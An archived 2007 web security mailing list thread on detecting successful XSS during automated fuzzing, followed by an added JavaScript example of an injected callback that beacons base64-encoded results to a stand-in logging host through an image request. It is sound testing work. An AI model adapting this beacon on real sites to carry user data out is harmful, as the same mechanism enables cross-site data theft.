RE: [WEB SECURITY] How to detect XSS in an automated fashion
- From: <gaz_sec@xxxxxxxxxxxx>
- Subject: RE: [WEB SECURITY] How to detect XSS in an automated fashion
- Date: Thu, 30 Aug 2007 02:17:59 +0100
True, my fuzzer works in the browser, so it doesn't need an
interpreter:
<http://www.businessinfo.co.uk/labs/jsfuzz/fuzz.php>
I'd imagine the best way to do an XSS fuzzer would be through the
browser as well. I guess the way to run a scan on an external site
would be to initialise some JavaScript using javascript: to create
your logging function call. IMO of course.
On Thu, 30 Aug 2007 01:48:29 +0100 Billy Hoffman
<Billy.Hoffman@xxxxxxxxxxxxxxx> wrote:
>Of course, that only works if your web scanner has a JavaScript
>interpreter!
>
>Billy
>
>-----Original Message-----
>From: gaz_sec@xxxxxxxxxxxx [mailto:gaz_sec@xxxxxxxxxxxx]
>Sent: Wed 8/29/2007 3:03 PM
>To: websecurity@xxxxxxxxxxxxx
>Cc: travisaltman@xxxxxxxxx
>Subject: Re: [WEB SECURITY] How to detect XSS in an automated
>fashion
>
>Hi Travis
>
>I've written an HTML/JS fuzzer in which I encountered the same
>problem. I decided to create a simple JavaScript callback which was
>executed on successful fuzz. I base64-encoded the result and sent the
>information via a normal HTML image (really a PHP script) which
>logged the results.
>
>Cheers
>
>Gareth
>
>On Wed, 29 Aug 2007 19:22:22 +0100 Travis Altman
><travisaltman@xxxxxxxxx> wrote:
>>I am trying to run through a dictionary of XSS attacks (aka
>>fuzzing) on a web application. What is the best way to determine, in
>>an automated fashion, if each attack was successful? Would I simply
>>review the source code of the response to see if my attack was
>>encoded or filtered?
>>
>>http://travisaltman.com
>
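The callback-plus-image logging pattern Gareth describes, written out as an added JavaScript example; it is not part of the original thread or of the fuzzer linked above. It assumes a hypothetical logging endpoint (`https://scanner.example/xss-log.php`) that takes a single `r` parameter, a per-scan token the logger checks so it only records hits from its own run, and a numeric payload id that the harness stamps into each payload it submits. The logger side is written in the same file so the whole round trip can be exercised offline.

```javascript
// Added example: how a fuzz harness learns that an injected payload actually
// executed in the browser. Each payload carries a call to xssHit(<payloadId>);
// if the browser runs it, the callback encodes a small record and requests it
// as an image from the logging endpoint. The endpoint, parameter name and scan
// token are assumptions made for this example, not values from the thread.

const LOG_ENDPOINT = 'https://scanner.example/xss-log.php'; // hypothetical
const SCAN_TOKEN = 'scan-7f3a';                              // constructed, one per run

// Encode a record as base64 of its JSON form. encodeURIComponent runs first so
// non-ASCII characters survive btoa, which only accepts Latin-1 input.
function encodeRecord(record) {
  return btoa(encodeURIComponent(JSON.stringify(record)));
}

function decodeRecord(b64) {
  return JSON.parse(decodeURIComponent(atob(b64)));
}

// Build the beacon URL the browser will request. Only the payload id and the
// location it fired in are reported; the page content itself is not sent.
function buildBeaconUrl(payloadId, where, token = SCAN_TOKEN) {
  const record = { token, payloadId, where, t: Date.now() };
  return LOG_ENDPOINT + '?r=' + encodeURIComponent(encodeRecord(record));
}

// The callback each fuzz payload invokes. An Image request is used because a
// plain GET for an image works from any origin without needing to read the
// response, which is all a fire-and-forget log needs. Returns the URL so the
// harness can record it; in a non-browser runtime no request is made.
function xssHit(payloadId) {
  const where = typeof location !== 'undefined' ? location.href : 'unknown';
  const url = buildBeaconUrl(payloadId, where);
  if (typeof Image !== 'undefined') {
    new Image().src = url;
  }
  return url;
}

// Logger-side validation, i.e. what the PHP script in the thread would do.
// Requests without the current scan token are dropped so unrelated traffic to
// the endpoint cannot pollute the results, the record is size-capped, and a
// malformed record is rejected rather than crashing the logger.
function parseBeacon(url, expectedToken = SCAN_TOKEN) {
  const m = /[?&]r=([^&#]+)/.exec(url);
  if (!m) return null;
  const b64 = decodeURIComponent(m[1]);
  if (b64.length > 2048) return null;
  let record;
  try {
    record = decodeRecord(b64);
  } catch (e) {
    return null;
  }
  if (!record || record.token !== expectedToken) return null;
  if (typeof record.payloadId !== 'number') return null;
  return record;
}
```

Each payload id maps back to the exact string the harness submitted, so a hit in the log tells you which payload executed and on which page, which is the question Travis asked; checking the response body for whether the payload was encoded or filtered cannot tell you that, because it does not show whether the browser would actually run it.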
----------------------------------------------------------------------------
Join us on IRC: irc.freenode.net #webappsec
Have a question? Search The Web Security Mailing List Archives:
http://www.webappsec.org/lists/websecurity/
Subscribe via RSS:
http://www.webappsec.org/rss/websecurity.rss [RSS Feed]
Brought to you by http://www.webappsec.org